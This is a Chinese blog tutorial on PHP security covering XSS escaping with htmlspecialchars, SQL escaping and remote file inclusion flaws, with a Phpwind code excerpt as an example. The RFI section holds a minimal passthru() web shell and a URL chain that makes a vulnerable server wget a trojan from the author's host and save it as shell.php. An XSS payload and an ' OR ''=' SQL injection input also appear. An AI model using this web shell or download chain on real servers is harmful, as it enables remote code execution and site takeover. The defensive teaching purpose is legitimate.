邪罗刹的菠萝阁

> PHP 的代码安全一直是一个重点，我们需要在存储数据的之前过滤，需要在读取之后转义。
> 以防范有可能出现的攻击。看这个图，人民网微博上线没多久就杯具鸟，╮(╯▽╰)╭。

> 最近又出现了 Phpwind 的几个漏洞，WP2.7 也有出现漏洞，QQMail 也出现XSS。
> P.s. 最近看了《神话》，吕素居然就这样挂了，杯具啊杯具，受不鸟，都不想继续看了。

一. PHP的一些安全要点：

1. 表单数据转意：

> 一般来说，我们如果需要输出获取到的表单数据，输出之前一定要记得转义才好。
> 如果没有转义的话，就会出现漏洞，比如XSS。假设有一个未进行转义的留言本程序。
> 我们在一个输入框中写入以下的代码，代码是JS的一个警告窗口弹出效果。

1

<script>alert('站点已被占领 by XXX黑客团队')</script>

> 这样当大家浏览到这个留言本页面的时候就会弹出一个灰常简单又牛叉的窗口，哈哈。
> 比如下面这个是人民网微博闹出来的一个大乌龙，人民微博一上线就被群体爆菊了。

> 所以，我们需要将 "< " ">" 等一些被执行的入侵代码中包含的字符进行转义。
> 所以我们就需要用到函数 htmlspecialchars，很帅的函数 O(∩_∩)O。
> 这个函数会影响到的字符如下，这样子处理就可以正常查看而且不会被执行啦。

1
2
3
4
5
6
7
8
9

> 1 - & （和号） 成为 &
> 2 - " （双引号） 成为 "
> 3 - ' （单引号） 成为 '
> 4 - < （小于） 成为 &lt;
> 5 - > （大于） 成为 &gt;
 
> 1 - ENT_COMPAT - 默认。仅编码双引号
> 2 - ENT_QUOTES - 编码双引号和单引号
> 3 - ENT_NOQUOTES - 不编码任何引号

1
2

//嘻嘻，用法就应该像下面这个样子呢。
echo htmlspecialchars($_GET['psw'], ENT_QUOTES);

2. 远程包含漏洞：

> 远程包含漏洞出现在 include() require() include_once() require_once() 中。
> 因为这几个函数是可以像下面这个例子一样执行代码的，灰常牛叉的一种功能。

> 这是一个 Phpwind 爆出的漏洞，文件在 apps/groups/index.php。
> 而出现的原因则是变量未初始化，$route 和 $basePath 都没有初始化。

1
2
3
4
5
6
7
8

<?php
if ($route == "groups") {
require_once $basePath . '/action/m_groups.php';
} elseif ($route == "group") {
require_once $basePath . '/action/m_group.php';
} elseif ($route == "galbum") {
require_once $basePath . '/action/m_galbum.php';
}

> 我们影响变量的值使其包含 http://www.evlos.org/action/m_galbum.php。
> 一般来说远程包含PHP文件是需要不支持PHP的空间的，因为支持的话就会包含失败。
> 也就是说，如果可以的话，远程包含一般是包含 m_galbum.txt 这样的文件。
> 所以不支持PHP的空间显示PHP文件的时候，会直接显示源代码的，就等同于文本。

3. 如何利用远程包含漏洞：

> 简单举一个例子，我们把下面的文件保存为 command.txt 文件假设地址如下。
> 类型为纯文本即可。http://tool.evlos.org/file/command.txt。

1
2
3
4
5
6
7

<?php
if (get_magic_quotes_gpc()) {
  $_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);
}
ini_set("max_execution_time",0);
passthru($_REQUEST["cmd"]);
?>

> 假设出现漏洞的文件是这个傻傻的样子，代码如下，O(∩_∩)O 嘎嘎。
> 同时假设地址为 - http://tool.evlos.org/file/index.php。

1
2
3

<?php
  include $_GET['test'];
?>

> 假设木马地址为 - http://tool.evlos.org/file/mm.txt
> 在 Linux 主机上面我们就可以在地址栏输入以下代码将木马传到目标主机上。

1
2
3

http://tool.evlos.org/file/index.php?test=
http://tool.evlos.org/file/command.txt?cmd=
wget http://tool.evlos.org/file/mm.txt -O shell.php

4. SQL 输入转义：

> 过滤了 $_GET $_POST $_COOKIE 几个常见的输入来源之后。
> 我们也要用 mysql_real_escape_string 函数来保护 Mysql 数据库。
> 这是一个简单的防注入技巧，代码如下，这个样子就可以咯。

1
2
3
4
5
6
7

<?php
$sqlc = "UPDATE users SET
  name='.mysql_real_escape_string($user).'
  WHERE id='.mysql_real_escape_string($id).'";
mysql_query($sqlc);
?>
//受影响的字符　\x00　\n　\r　\　'　"　\x1a

> 假设未进行保护，那么就会有可能出现最熟悉的 “or=” Mysql 注入漏洞了。

1
2
3
4
5
6
7
8
9
10
11

<?php
mysql_connect("localhost", "hello", "321");
$sql = "SELECT * FROM users
WHERE user='{$_POST['user']}'
AND password='{$_POST['pwd']}'";
mysql_query($sql);
 
// 假设传输过来的数据像下面这个样子。
// $_POST['user'] = 'john';
// $_POST['pwd'] = "' OR ''='"; 
?>

二. 睡觉去咯：

> 今天看到一个阿三的演讲，描绘了虚拟现实世界结合的完美生活，灰常鸡冻。
> 开一个叫兽处的传送门 - http://www.chunbaba.net/blog/?p=554

> Phpwind 7.5 的漏洞和 WordPress 2.7 的漏洞，它们的详细信息在这里。
> 开俩传送门 - http://www.80vul.com/pwvul/phpwind.txt
> 还有WP的门 - http://www.80vul.com/exp/wordpress.txt

> 最近搜狐上线的搜搜舞文弄墨服务，可以生成藏头诗和层层递进的诗，嘿嘿嘿。
> 传送门 - http://labs.soso.com/app.q?app=makepoem

> 好咯，小邪就讲解到这里了，好多童鞋都觉得小邪的文章太长了呢。
> 所以小邪以后会尽量短小精悍一点，囧，貌似这篇文章还是有点长。
> 那么祝愿有兴趣阅读的盆友坚挺一点儿，小邪又要去睡觉罗 Zzzz 晚安呐。